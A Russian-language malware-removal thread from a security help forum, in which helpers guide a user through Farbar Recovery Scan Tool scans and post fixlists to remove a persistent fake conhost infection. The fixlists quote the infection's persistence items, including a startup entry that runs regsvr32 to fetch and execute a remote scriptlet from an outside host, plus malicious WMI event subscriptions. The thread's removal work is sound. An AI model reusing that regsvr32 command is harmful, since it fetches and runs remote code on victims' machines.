Перейти к содержанию

Автозапуск вируса


Роман Паятелев

Рекомендуемые сообщения

Добрый день. Ситуация следующая. Однажды появился данный вирус(conhost он же ТОДО с китайскими иероглифами). Появляется он стабильно после включения или перезагрузки компьютера. Его можно убить из диспетчера задач, но он появится в след. раз снова. Боролся по-всякому. Удалял браузеры.

CollectionLog-2019.09.04-20.17.zip

Изменено пользователем Роман Паятелев
Ссылка на сообщение
Поделиться на другие сайты

Скачайте Farbar Recovery Scan Tool NAAC5Ba.png и сохраните на Рабочем столе.

  • Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

2. Убедитесь, что в окне Optional Scan отмечены List BCD и 90 Days Files.

3munStB.png

3. Нажмите кнопку Scan.

4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.

5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).

6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.

Ссылка на сообщение
Поделиться на другие сайты

Скачайте Farbar Recovery Scan Tool NAAC5Ba.png и сохраните на Рабочем столе.

  • Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

2. Убедитесь, что в окне Optional Scan отмечены List BCD и 90 Days Files.

3munStB.png

3. Нажмите кнопку Scan.

4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.

5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).

6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.

 

FRST.rar

Ссылка на сообщение
Поделиться на другие сайты

Здравствуйте,

 

Удалите остатки от антивируса Avast утилитой Avast Remover.

 

Уточните пожалуйста файл лога FRST.txt вы изменяли, он похоже модифицирован и не содержит необходимой информации?

  • Закройте и сохраните все открытые приложения.
  • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt с поддержкой Unicode в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:

    Start::
    CMD: wmic /Namespace:\\root\default Path SystemRestore Call Enable "%SystemDrive%"
    CreateRestorePoint:
    CloseProcesses:
    ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
    ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} =>  -> No File
    ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} =>  -> No File
    WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckyoumm4\"",Filter="__EventFilter.Name=\"fuckyoumm3\":: <==== ATTENTION
    WMI:subscription\__TimerInstruction->fuckyoumm2_itimer:: <==== ATTENTION
    WMI:subscription\__IntervalTimerInstruction->fuckyoumm2_itimer:: <==== ATTENTION
    AlternateDataStreams: C:\Users\User:Heroes & Generals [38]
    MSCONFIG\startupreg: start => regsvr32 /u /s /i:http://js.0603bye.info:280/v.sct scrobj.dll
    MSCONFIG\startupreg: YandexSearchBand => 
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Ms76AF3F80App => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Ms76AF3F80App => ""="Service"
    FirewallRules: [{3D3BB43E-1723-4CE7-8CB4-76D21585FB55}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\App Game Kit 2\Tier 1\Editor\bin\AGK.exe No File
    FirewallRules: [{F0EED018-801A-47D2-9B5D-8268B85DA5D3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\App Game Kit 2\Tier 1\Editor\bin\AGK.exe No File
    FirewallRules: [{30333612-3E05-4C90-9AE3-8241377CD90F}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe No File
    FirewallRules: [{E5550760-7B40-4A2B-BEDC-16C0B4A31DD6}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe No File
    FirewallRules: [TCP Query User{B35CC72B-0E5E-47B2-8388-EAC2EDA85972}C:\program files (x86)\steam\steamapps\common\paladins\binaries\win64\paladins.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\paladins\binaries\win64\paladins.exe No File
    FirewallRules: [UDP Query User{EDB2F4EA-882C-49A3-90A4-07C3FB89FDAC}C:\program files (x86)\steam\steamapps\common\paladins\binaries\win64\paladins.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\paladins\binaries\win64\paladins.exe No File
    FirewallRules: [TCP Query User{6E42B419-15EB-4324-95F5-90C4471279C9}C:\games\ghost recon future soldier\future soldier dx11.exe] => (Block) C:\games\ghost recon future soldier\future soldier dx11.exe No File
    FirewallRules: [UDP Query User{E7647E94-F36D-4301-8D56-A787F339D576}C:\games\ghost recon future soldier\future soldier dx11.exe] => (Block) C:\games\ghost recon future soldier\future soldier dx11.exe No File
    FirewallRules: [TCP Query User{82FB278C-6609-463D-A82D-3E39A793F1CF}C:\games\ghost recon future soldier\future soldier dx9.exe] => (Allow) C:\games\ghost recon future soldier\future soldier dx9.exe No File
    FirewallRules: [UDP Query User{CE2DD9B0-A775-4B83-9315-D33D38892916}C:\games\ghost recon future soldier\future soldier dx9.exe] => (Allow) C:\games\ghost recon future soldier\future soldier dx9.exe No File
    FirewallRules: [TCP Query User{14D23D21-3147-4E29-BE5C-3574C93D43F8}C:\program files (x86)\need for speed most wanted limited edition\nfs13.exe] => (Allow) C:\program files (x86)\need for speed most wanted limited edition\nfs13.exe No File
    FirewallRules: [UDP Query User{1A898B4C-5F09-4EB4-8AC9-04853F2447D4}C:\program files (x86)\need for speed most wanted limited edition\nfs13.exe] => (Allow) C:\program files (x86)\need for speed most wanted limited edition\nfs13.exe No File
    FirewallRules: [TCP Query User{20730BF1-65A1-4BDC-BF15-069E09E17D53}C:\games\call of duty black ops 2\t6sp.exe] => (Allow) C:\games\call of duty black ops 2\t6sp.exe No File
    FirewallRules: [UDP Query User{96C8CC29-1412-47B4-BE06-A6472D482CAD}C:\games\call of duty black ops 2\t6sp.exe] => (Allow) C:\games\call of duty black ops 2\t6sp.exe No File
    FirewallRules: [TCP Query User{4CA55C6C-B45F-48F6-987C-F996FE6EA284}C:\program files (x86)\outlast whistleblower\binaries\win64\olgame.exe] => (Block) C:\program files (x86)\outlast whistleblower\binaries\win64\olgame.exe No File
    FirewallRules: [UDP Query User{BA21F38D-A0FA-497B-BFCD-DC14954C9AA3}C:\program files (x86)\outlast whistleblower\binaries\win64\olgame.exe] => (Block) C:\program files (x86)\outlast whistleblower\binaries\win64\olgame.exe No File
    FirewallRules: [{2F32C00F-FE42-4577-8A27-DBDD55C4FF2E}] => (Block) %SystemRoot%\System32\regsvr32.exe No File
    Reboot:
    End::
    
  • Запустите FRST и нажмите один раз на кнопку Fix и подождите.
  • Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
  • Обратите внимание, что компьютер будет перезагружен.
Ссылка на сообщение
Поделиться на другие сайты

Приложите пожалуйста новые логи и убедитесь, чтобы были выбраны необходимые галочки.

 

 

- Скачайте Farbar Recovery Scan Tool FRST_Icon.png и сохраните на Рабочем столе.

 

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

  • Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
  • Убедитесь, что в окне Optional Scan отмечены "List BCD" и "SigCheckExt".

    FRST.png

  • Нажмите кнопку Scan.
  • После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
  • Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.
Ссылка на сообщение
Поделиться на другие сайты

  • Закройте и сохраните все открытые приложения.
  • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt с поддержкой Unicode в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:

    Start::
    CreateRestorePoint:
    CloseProcesses:
    Task: {044A6734-E90E-4F8F-B357-B2DC8AB3B5EC} - \Microsoft\Windows\Time Synchronization\SynchronizeTime -> No File <==== ATTENTION
    Task: {0667B506-B267-4269-9C43-CB5FE686ADF2} - \Microsoft\Windows\Media Center\InstallPlayReady -> No File <==== ATTENTION
    Task: {07FC3CAD-0F41-4019-A153-4D21BABA7374} - \Microsoft\Windows\Media Center\PvrScheduleTask -> No File <==== ATTENTION
    Task: {088482FA-65B8-4E17-9ABF-1DCD48E8D373} - \Microsoft\Windows\Tcpip\IpAddressConflict1 -> No File <==== ATTENTION
    Task: {09F06BFE-A3C8-40E3-846A-6E6F4000C238} - \Microsoft\Windows\Tcpip\IpAddressConflict2 -> No File <==== ATTENTION
    Task: {0ADDB149-AC5A-4049-9432-C23C255D79CA} - \Microsoft\Windows\Media Center\PBDADiscoveryW2 -> No File <==== ATTENTION
    Task: {128FFC31-659E-4AAC-B398-5FA8F02D21F4} - \Microsoft\Windows\Media Center\OCURActivate -> No File <==== ATTENTION
    Task: {14FA545C-FE85-43BE-A05B-3B19227EFD92} - \Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver -> No File <==== ATTENTION
    Task: {1F7B7221-AE8F-44F3-BA82-F7D260F51964} - \Microsoft\Windows\Task Manager\Interactive -> No File <==== ATTENTION
    Task: {2470470F-2634-478E-B181-571E98A789BB} - \Microsoft\Windows\Multimedia\SystemSoundsService -> No File <==== ATTENTION
    Task: {250FE810-B8DA-45A1-9DEB-D645F3B75112} - \Microsoft\Windows\Media Center\PvrRecoveryTask -> No File <==== ATTENTION
    Task: {28011108-68DF-4C73-B91B-57427D501BBA} - \Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Manual) -> No File <==== ATTENTION
    Task: {2F57269B-1E09-4E2D-AB1E-B0FDAC7D279C} - \Microsoft\Windows\WindowsBackup\ConfigNotification -> No File <==== ATTENTION
    Task: {35E235FF-EA95-42B7-8E16-D7FBE47A5DA7} - \Microsoft\Windows\Media Center\PeriodicScanRetry -> No File <==== ATTENTION
    Task: {432FCF52-F91E-4776-B653-776DFC9321E9} - \Microsoft\Windows\Media Center\OCURDiscovery -> No File <==== ATTENTION
    Task: {47536D45-EEEC-4BDC-8183-A4DC1F8DA9E4} - \Microsoft\Windows\Customer Experience Improvement Program\UsbCeip -> No File <==== ATTENTION
    Task: {486D715E-6AA2-44CF-BC48-B6990CBB53C6} - \Microsoft\Windows\Shell\WindowsParentalControlsMigration -> No File <==== ATTENTION
    Task: {4A2977B6-DC6A-418B-B4E4-BFB0FC48E8C4} - \Microsoft\Windows\Media Center\SqlLiteRecoveryTask -> No File <==== ATTENTION
    Task: {4C8B01A2-11FF-4C41-848F-508EF4F00CF7} - \Microsoft\Windows\TextServicesFramework\MsCtfMonitor -> No File <==== ATTENTION
    Task: {527B421B-223E-4E97-9DA0-B62FE69DA565} - \DelayedItemsByChemtableSoftware\Steam -> No File <==== ATTENTION
    Task: {52E1C4EB-1896-48B8-8E7B-6E6F23B99A2D} - \Microsoft\Windows\SideShow\AutoWake -> No File <==== ATTENTION
    Task: {5A40E926-9E86-4B89-9CFD-B12311724371} - \Microsoft\Windows\UPnP\UPnPHostConfig -> No File <==== ATTENTION
    Task: {5B42DD9C-5A26-4F27-BB95-34603F0997E5} - \Microsoft\Windows\Shell\WindowsParentalControls -> No File <==== ATTENTION
    Task: {5C0AEEEA-C154-45BE-8499-BEA5F11BAFF6} - \Microsoft\Windows\Defrag\ScheduledDefrag -> No File <==== ATTENTION
    Task: {5F5A18EB-DC73-4E45-A11C-B59043598412} - \Microsoft\Windows\CertificateServicesClient\SystemTask -> No File <==== ATTENTION
    Task: {60770713-E09B-4881-B7B6-713A452D1AD0} - \Microsoft\Windows\Media Center\ObjectStoreRecoveryTask -> No File <==== ATTENTION
    Task: {613612BA-897D-44CE-8DC1-8FC283F9FD51} - \Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Automated) -> No File <==== ATTENTION
    Task: {6738BA6E-EA75-4B6B-B8B8-71F0336DD8EF} - \Microsoft\Windows\User Profile Service\HiveUploadTask -> No File <==== ATTENTION
    Task: {695F1CCC-602E-4224-8D99-65355D6197C3} - \Microsoft\Windows\SideShow\SystemDataProviders -> No File <==== ATTENTION
    Task: {6F1D42A0-9F65-4ADD-876B-2DD80ED421BE} - \Microsoft\Windows\SideShow\GadgetManager -> No File <==== ATTENTION
    Task: {72DB7465-BC54-491B-A92A-4637A28C9BBF} - \Microsoft\Windows\AppID\VerifiedPublisherCertStoreCheck -> No File <==== ATTENTION
    Task: {74B0AEDF-610B-487C-8EFD-856E43036654} - \Microsoft\Windows\Media Center\PBDADiscovery -> No File <==== ATTENTION
    Task: {753C47AE-EC5E-44B3-95A9-2C8E553F0E39} - \Microsoft\Windows\Windows Media Sharing\UpdateLibrary -> No File <==== ATTENTION
    Task: {7AFCC0CA-7121-422A-AB45-B0E8D599FF08} - \Microsoft\Windows\CertificateServicesClient\UserTask -> No File <==== ATTENTION
    Task: {81540B9F-B5BF-47EB-9C95-BE195BF2C664} - \Microsoft\Windows\NetTrace\GatherNetworkInfo -> No File <==== ATTENTION
    Task: {940597BC-0A65-480F-B04C-CDCD30E9F810} - \{CA815833-F057-4881-9106-447D7CC2B2F9} -> No File <==== ATTENTION
    Task: {9435F817-FED2-454E-88CD-7F78FDA62C48} - \Microsoft\Windows\WDI\ResolutionHost -> No File <==== ATTENTION
    Task: {94AAB8D1-0119-4F41-A22A-3C9485BF07B1} - \Microsoft\Windows\Media Center\DispatchRecoveryTasks -> No File <==== ATTENTION
    Task: {95050995-4F3F-4812-9E55-C7620347FEDE} - \Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector -> No File <==== ATTENTION
    Task: {968B86ED-5DDB-4106-819D-38230D552AC0} - \Microsoft\Windows\Media Center\ReindexSearchRoot -> No File <==== ATTENTION
    Task: {994C86AD-A929-4B2C-88A0-4E25A107A029} - \Microsoft\Windows\SystemRestore\SR -> No File <==== ATTENTION
    Task: {9979CB83-103A-4105-9E5D-C74B0AF6D198} - \Microsoft\Windows\CertificateServicesClient\UserTask-Roam -> No File <==== ATTENTION
    Task: {9CFDC729-26B1-4627-A009-1A9C0B5FB704} - \Microsoft\Windows\SideShow\SessionAgent -> No File <==== ATTENTION
    Task: {A2A0B92B-F34C-444B-A6E5-F25C69C4001B} - \Microsoft\Windows\MobilePC\HotStart -> No File <==== ATTENTION
    Task: {A35BB7A6-5F0C-4C9F-8450-2B3BED532D51} - \Microsoft\Windows\WindowsColorSystem\Calibration Loader -> No File <==== ATTENTION
    Task: {A48CABBF-24C8-4B87-B00F-9261807C3B43} - \Microsoft\Windows\AppID\PolicyConverter -> No File <==== ATTENTION
    Task: {A6AF9377-77CE-47AB-AD7D-EC32CAD0C82D} - \Microsoft\Windows\Location\Notifications -> No File <==== ATTENTION
    Task: {A7C73732-9F11-4281-8D19-764D4EC9D94D} - \Microsoft\Windows\Application Experience\ProgramDataUpdater -> No File <==== ATTENTION
    Task: {AB7AEE87-1554-4EA0-BFBB-574A380515D2} - \Microsoft\Windows\Media Center\mcupdate -> No File <==== ATTENTION
    Task: {AC4E5ACF-89F7-4220-BA21-81EE183975E2} - \Microsoft\Windows\Application Experience\AitAgent -> No File <==== ATTENTION
    Task: {AC668097-4D6B-4093-AC14-014C09DBF820} - \Microsoft\Windows\Ras\MobilityManager -> No File <==== ATTENTION
    Task: {AC96F495-6AD3-4A88-AFB9-0BCF8D1B65EA} - \Microsoft\Windows\Media Center\ehDRMInit -> No File <==== ATTENTION
    Task: {AE8FCFF7-660D-46A5-B939-126915D7E8BD} - \klcp_update -> No File <==== ATTENTION
    Task: {B0CBAB43-44FC-469B-A4CE-87426761FDCE} - \Microsoft\Windows\PerfTrack\BackgroundConfigSurveyor -> No File <==== ATTENTION
    Task: {B5E2650A-61CB-4E2C-8913-DF20F9EB1A40} - \Microsoft\Windows\Offline Files\Background Synchronization -> No File <==== ATTENTION
    Task: {BC4F9900-E41A-4F52-8E12-4BB0941E2094} - \Microsoft\Windows\Media Center\UpdateRecordPath -> No File <==== ATTENTION
    Task: {BCE52A56-C5BA-47DD-9E89-C932093C9E7C} - \Microsoft\Windows\Media Center\RecordingRestart -> No File <==== ATTENTION
    Task: {BE669C13-8165-4536-96D0-6D6C39292AAE} - \Microsoft\Windows\Diagnosis\Scheduled -> No File <==== ATTENTION
    Task: {C016366B-7126-46CA-B36B-592A3D95A60B} - \Microsoft\Windows\Customer Experience Improvement Program\Consolidator -> No File <==== ATTENTION
    Task: {C493322E-396C-4313-A684-097E2C44D451} - \Microsoft\Windows\Media Center\PBDADiscoveryW1 -> No File <==== ATTENTION
    Task: {CA4B8FF2-A4D2-4D88-A52E-3A5BDAF7F56E} - \Microsoft\Windows\Registry\RegIdleBackup -> No File <==== ATTENTION
    Task: {CB3D64BF-C0C9-45FF-BFB0-FF1A8F680186} - \Microsoft\Windows\RemoteAssistance\RemoteAssistanceTask -> No File <==== ATTENTION
    Task: {CEE64558-E1A7-4D9D-80A7-2001912BE5B5} - \Microsoft\Windows\MemoryDiagnostic\CorruptionDetector -> No File <==== ATTENTION
    Task: {D0250F3F-6480-484F-B719-42F659AC64D5} - \Microsoft\Windows\Windows Error Reporting\QueueReporting -> No File <==== ATTENTION
    Task: {D21ABCD6-787A-4A0B-B1EA-BA04EA60FD13} - \Microsoft\Windows\Media Center\RegisterSearch -> No File <==== ATTENTION
    Task: {D385E4DB-B868-471B-813E-358466A554EA} - \Microsoft\Windows\Media Center\ConfigureInternetTimeService -> No File <==== ATTENTION
    Task: {D7B6E81D-3CF4-432C-84D2-24213F4316E6} - \Microsoft\Windows\Autochk\Proxy -> No File <==== ATTENTION
    Task: {D9B52DA8-36E4-43CF-856F-AFC2F35C4D1D} - \Microsoft\Windows\Media Center\ActivateWindowsSearch -> No File <==== ATTENTION
    Task: {DA41DE71-8431-42FB-9DB0-EB64A961DEAD} - \Microsoft\Windows\Maintenance\WinSAT -> No File <==== ATTENTION
    Task: {E22A8667-F75B-4BA9-BA46-067ED4429DE8} - \Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChange -> No File <==== ATTENTION
    Task: {E3163C33-301D-4730-A266-5518C5ED3967} - \Microsoft\Windows\Bluetooth\UninstallDeviceTask -> No File <==== ATTENTION
    Task: {E5F3CC87-A17B-4BF6-A1F1-47C2E5C43F99} - \update-S-1-5-21-4018456726-538124734-3878147103-1000 -> No File <==== ATTENTION
    Task: {E806CBBB-3E4A-473C-BE13-7A21D4B2FC98} - \Microsoft\Windows\Offline Files\Logon Synchronization -> No File <==== ATTENTION
    Task: {EACA24FF-236C-401D-A1E7-B3D5267B8A50} - \Microsoft\Windows\RAC\RacTask -> No File <==== ATTENTION
    Task: {EB02381F-D652-4B1C-894A-712498C62C51} - \Microsoft\Windows\MUI\LPRemove -> No File <==== ATTENTION
    Task: {F430E82D-0A8F-4634-9224-6D5553B6901F} - \Microsoft\Windows\Media Center\MediaCenterRecoveryTask -> No File <==== ATTENTION
    Task: {FA2BC0A6-8D4B-458A-85C8-2B8C72487513} - \Microsoft\Windows\MemoryDiagnostic\DecompressionFailureDetector -> No File <==== ATTENTION
    Task: {FB3C354D-297A-4EB2-9B58-090F6361906B} - \Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem -> No File <==== ATTENTION
    Task: {FBCC8FEA-19E0-496A-9329-B4BEB64343D6} - \update-sys -> No File <==== ATTENTION
    Task: {FDD56C73-F0D5-41B6-B767-6EFFD7966428} - \Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask -> No File <==== ATTENTION
    HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{d60e96af-803d-4c2f-b2ec-5e8d508ac80f} <==== ATTENTION (Restriction - IP)
    FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
    FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
    File: C:\Windows\System32\Ms76AF3F80App.dll
    S2 Ms76AF3F80App; C:\Windows\System32\Ms76AF3F80App.dll [X]
    S2 mssecsvc2.0; no ImagePath
    S2 mssecsvc2.1; no ImagePath
    File: C:\Windows\System32\drivers\nvvad64v.sys
    File: C:\Windows\System32\DRIVERS\nvvhci.sys
    2019-09-04 19:35 - 2018-11-08 01:44 - 000000084 _____ C:\Program Files\Common Files\xpdown.dat
    2019-09-04 19:34 - 2018-09-20 22:58 - 000000081 _____ C:\Windows\system32\s
    2019-09-04 19:34 - 2018-09-20 22:58 - 000000079 _____ C:\Windows\system32\ps
    2019-09-04 19:34 - 2018-09-20 22:58 - 000000077 _____ C:\Windows\system32\p
    2018-11-05 12:48 - 2018-12-13 17:38 - 000000084 _____ () C:\Program Files\Common Files\xp.dat
    2018-11-08 01:44 - 2019-09-04 19:35 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat
    WMI:subscription\__EventFilter->fuckyoumm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Ms76AF3F80App => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dump_76AF3F80.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Ms76AF3F80App => ""="Service"
    MSCONFIG\startupreg: YandexSearchBand => 
    FirewallRules: [TCP Query User{B8E8EBB8-A444-4C32-94C6-592C97AC1596}C:\program files (x86)\saints row.the third.v 1.0.0.1u4 + 19 dlc\saintsrowthethird_dx11.exe] => (Allow) C:\program files (x86)\saints row.the third.v 1.0.0.1u4 + 19 dlc\saintsrowthethird_dx11.exe No File
    FirewallRules: [UDP Query User{FF4D1921-11A0-4C14-90AE-C5959245EED6}C:\program files (x86)\saints row.the third.v 1.0.0.1u4 + 19 dlc\saintsrowthethird_dx11.exe] => (Allow) C:\program files (x86)\saints row.the third.v 1.0.0.1u4 + 19 dlc\saintsrowthethird_dx11.exe No File
    Reboot:
    End::
    
  • Запустите FRST и нажмите один раз на кнопку Fix и подождите.
  • Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
  • Обратите внимание, что компьютер будет перезагружен.
Ссылка на сообщение
Поделиться на другие сайты

Если проблема более вас не беспокоит, то выполните завершающий эпат.

 

В завершение:

1.

 

Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.

Компьютер перезагрузится.

 

Остальные утилиты лечения и папки можно просто удалить.

 

2.

  • Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе
  • Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)
  • Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
  • Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
  • Прикрепите этот файл к своему следующему сообщению.
Ссылка на сообщение
Поделиться на другие сайты

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.

Гость
Ответить в этой теме...

×   Вставлено с форматированием.   Вставить как обычный текст

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.

  • Похожий контент

    • Eoorreg
      От Eoorreg
      Добрый вечер прошу помощи в лечении..
      CollectionLog-2019.10.17-22.27.zip
    • The_TAB
      От The_TAB
      Доброго времени суток. 
      По вечерам если компьютер включенный простаивает, то выскакивает окно (см. файл +1). Перешел через процессы в место нахождения файл, файл conhost, следом удалил его, перезагрузил компьютер процесс снова висит и файл на месте.
      На другом форуме посоветовали установить Malware и все пройдет, провел проверку, все что он нашел удалил, перезагрузил, файлы снова на месте, и окно так же выскакивает. Провел снова проверку все на месте, и добавил файл в карантин. Отчет с программы приложу (см. файл +2).

      +2.txt
    • Vadim2268
      От Vadim2268
      Доброго времени суток!

      Спустя три недели после обновления ПК и с нуля установленной системы ребенок при просмотре мультиков умудрился наловить вирусов.
       
      много букв и картинок:


      Полез внутрь ПК, отключил HDD после ПК быстро загрузился, быстро завершил работу. Это позволило провести сбор логов, файл прилагаю.
       
      Прошу помощи.
      CollectionLog-2018.12.14-11.32.zip
    • sambase
      От sambase
      У меня server 2008 R2 и все было хорошо. Купили новый комп, рабочая станция для сотрудника, настроили, заводим в домен, как обычно и возникает ошибка: "При присоединении к домену "название" произошла следующая ошибка: Не найден сетевой путь." 
        На этом сервере есть роли:  + DHCP-сервер - работает, адреса выдает  + DNS-сервер  + Доменные службы Active Directory  + Файловые службы    Когда пытаюсь зайти по сети на сервер \\SERVER выдает ошибку  Не найден сетевой путь.  Код ошибки: 0x80070035    В планировщике заданий была какая-то Mysa, Mysa2, Mysa3 - удалил её и CureIt всё проверил, потом  Kaspersky Virus Removal Tool 2015 проверил, потом логи сделал. Не могу завести комп в домен, помогите спасти сервер.  
      CollectionLog-2018.11.28-17.58.zip
    • YSOFF
      От YSOFF
      Здравствуйте. Прошу помощи с удалением троянов: HEUR:Trojan.Win32.Generic (фальшивый conhost.exe), Trojan.Win32.Ukpa.a (lsmose.exe, xmrstak_cuda_backend.dll) и HEUR:RiskTool.Win32.BitMiner.gen (xmrstak_opencl_backend.dll)
      Пытался переустановить KIS18, установка прерывается ошибкой и сообщение о возможности заражения вирусами.
      Проверил систему с помощью KVRT - утилита успешно находит трояны, удаляет, но после перезапуска они появляются вновь. Не появились только три записи Mysa в планировщике. Пробовал удалять все найденные файлы из под linux - безрезультатно, появляются снова. По советам в статье https://forum.kasperskyclub.ru/index.php?showtopic=56569&page=3пробовал исполнять скрипты для AVZ:
      begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); TerminateProcessByName('C:\Windows\debug\lsmose.exe'); QuarantineFile('C:\Windows\debug\lsmose.exe',''); QuarantineFile('C:\Windows\debug\xmrstak_cuda_backend.dll',''); QuarantineFile('C:\Windows\debug\xmrstak_opencl_backend.dll',''); QuarantineFile('C:\Windows\Temp\conhost.exe',''); DeleteFile('C:\Windows\debug\lsmose.exe','32'); DeleteFile('C:\Windows\debug\xmrstak_cuda_backend.dll','32'); DeleteFile('C:\Windows\debug\xmrstak_opencl_backend.dll','32'); DeleteFile('C:\Windows\Temp\conhost.exe','32'); ExecuteSysClean; ExecuteWizard('SCU', 2, 3, true); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); RebootWindows(true); end. Архив quarantine - 
      и UVS:
      ;uVS v4.0.5 [http://dsrt.dyndns.org] ;Target OS: NTv6.1 v400c BREG ;---------command-block--------- zoo %SystemRoot%\debug\xmrstak_opencl_backend.dll delref PS&AMP;C:\Windows\xmrstak_opencl_backend.dll delall %SystemRoot%\debug\xmrstak_opencl_backend.dll zoo %SystemRoot%\debug\xmrstak_cuda_backend.dll delref PS&AMP;C:\Windows\xmrstak_cuda_backend.dll delall %SystemRoot%\debug\xmrstak_cuda_backend.dll zoo %SystemRoot%\debug\lsmose.exe delref PS&AMP;C:\Windows\debug\lsmose.exe delall %SystemRoot%\debug\lsmose.exe zoo %SystemRoot%\Temp\conhost.exe delref PS&AMP;C:\Windows\Temp\conhost.exe delall %SystemRoot%\Temp\conhost.exe apply regt 28 regt 29 czoo restart Архив ZOO - 
       
      - после перезагрузки трояны в директориях C:\Windows\debug\ и в C:\Windows\Temp\ на месте.
      Сделал "полный образ автозапуска" в UVS - http://yadi.sk/d/hsUyrVZ03ahynB
       

      Сообщение от модератора Mark D. Pearlstone Не выполняйте рекомендации., которые написаны для других пользователей этого раздела.
      Не выкладывайте карантин и ссылки на него.
×
×
  • Создать...